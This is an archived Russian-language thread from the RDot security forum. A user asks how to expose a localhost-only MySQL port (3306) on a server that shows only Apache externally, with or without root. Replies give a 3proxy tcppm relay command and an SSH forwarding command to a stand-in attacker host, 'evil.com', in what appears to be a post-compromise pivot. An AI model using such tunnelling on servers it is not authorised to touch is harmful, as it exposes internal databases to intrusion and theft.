RDot: White Hat Security Community

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Сервисы, БД, Серверы/Network services, Databases, Servers (https://rdot.org/forum/forumdisplay.php?f=23)
-   -   Проброс локального порта наружу (https://rdot.org/forum/showthread.php?t=3345)

tavel 27.12.2014 03:22

Проброс локального порта наружу
 
Всем привет, есть сервер с MySQL на стандартном локальном порту 3306. MySQL доступен только локально. Наружу торчит только апач на 80-м порту.
Задача: сделать так, чтобы на этом сервере MySQL был доступен из внешней сети, т.е. пробросить порт 3306 с localhost наружу, чтобы снаружи торчал еще и MySQL на 3306.

Очень много читал про форвардинг при помощи iptables и SSH, но все очень запутанно описано. Абсолютно непонятно какие для какой опции требуются права, где требуется рут, где не требуется и возможно ли это все вообще сделать без рута? Может кто-то может на пальцах показать как это делается:
1) С рутом
2) Без рута, если это вообще возможно

P.S. Если это важно, то вот такая замечательная команда выводит 0:
cat /proc/sys/net/ipv4/conf/eth0/forwarding
и
echo '1' > /proc/sys/net/ipv4/conf/eth0/forwarding
не срабатывает.

vp$ 27.12.2014 11:25

если порт не принципиален то
Цитата:

tcppm -d 3307 localhost 3306
из набора 3proxy
конектиться с внешки на порт 3307, если порт не открылся, то курить фаер

Matthew 27.12.2014 12:43

Если достаточно временного коннекта и постоянный не нужен, то я бы посоветовал SSH форвардинг

Цитата:

ssh -L 127.1:3306:127.1:3306 user@evil.com
Затем на evil.com коннектимся к localhost:3306

tavel 27.12.2014 17:55

Цитата:

Сообщение от vp$ (Сообщение 37682)
если порт не принципиален то
Цитата:

tcppm -d 3307 localhost 3306
из набора 3proxy
конектиться с внешки на порт 3307, если порт не открылся, то курить фаер

Порт не принципиален и идея с 3proxy интересная, но вот опять же, права какие нужны для этого? Вот я скачал архив 3proxy, распаковал и запустил make -f Makefile.Linux. Получил наверное не меньше тысячи ошибок и понял что я его не соберу ) Так-то в системе gcc есть и он компилит всякое разное, я не первый раз софт собираю, но с 3proxy все печально. Скомпиленный бинарник tcppm под CentOS 6.4 x64 есть смысл искать?


Цитата:

Сообщение от Matthew (Сообщение 37683)
Если достаточно временного коннекта и постоянный не нужен, то я бы посоветовал SSH форвардинг
Цитата:

ssh -L 127.1:3306:127.1:3306 user@evil.com
Затем на evil.com коннектимся к localhost:3306

Аналогично. Я понимаю, что в этом варианте у меня должна быть еще одна машина с рутом (evil.com). Во-первых у меня её нет, но это ладно. Во-вторых непонятно какие зависимости мне нужны для запуска ssh с такими параметрами. Т.е. прямо в таком виде эта команда нигде не отработает даже под рутом. Как минимум надо -o StrictHostKeychecking=no добавить, а, скорее всего, и ещё кучу всего, о чём никто в одном месте нигде не писал, везде какие-то обрывочные сведения.

12309 26.01.2015 12:59

трай зыс https://rdot.org/forum/showthread.php?t=2040


Часовой пояс GMT +3, время: 07:22.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot